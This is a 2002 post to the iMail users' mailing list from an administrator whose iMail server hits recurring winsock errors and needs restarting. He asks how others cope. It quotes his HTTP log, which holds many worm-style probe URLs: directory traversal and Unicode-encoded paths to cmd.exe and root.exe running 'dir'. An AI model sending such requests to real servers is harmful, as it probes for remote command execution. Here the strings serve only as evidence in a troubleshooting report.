After loading 7.06 HF2 I still have the problem with iMail causing the winsock error that requires iMail to be restarted. I thought HF2 might fix this. To recap, I see in the http log requests of the form:
20020307 234337 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0. 20020307 234340 Info - 192.168.1.1 GET /MSADC/root.exe?/c+dir HTTP/1.0. 20020307 234346 Info - 192.168.1.1 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234349 Info - 192.168.1.1 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234352 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 20020307 234355 Info - 192.168.1.1 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234358 Info - 192.168.1.1 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234401 Info - 192.168.1.1 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234404 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234408 Info - 192.168.1.1 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234411 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234414 Info - 192.168.1.1 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234417 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234420 Info - 192.168.1.1 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234424 Info - 192.168.1.1 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020307 234427 Info - 192.168.1.1 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0. This "request set" happens about four times a day from different external IP addresses. My understanding is that this a Code Red (or variant) attack trying to target IIS web server. Eventually I see Winsock errors in the log which start out slow but then are constant: 20020315 072553 Socket Error - 192.168.1.1 Error while writing sockect due to error 10053 or malicious connection type. 20020315 072553 Socket Error - 192.168.1.1 Error while writing sockect due to error 10053 or malicious connection type. 20020315 072553 Socket Error - 192.168.1.1 Error while writing sockect due to error 10053 or malicious connection type. ... ... 20020316 221525 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type. 20020316 221626 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type. 20020316 221726 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type. 20020316 221827 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type. At this point iMail needs to be restarted. A restart is required about every 3 days. I don't understand why infrequent malicious connection attempts would cause iMail to corrupt the Winsock stack. How are other people dealing with this? Also, note the spelling error "sockect". Dan Please visit http://www.ipswitch.com/support/mailing-lists.html to be removed from this list. An Archive of this list is available at: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ Please visit the Knowledge Base for answers to frequently asked questions: http://www.ipswitch.com/support/IMail/
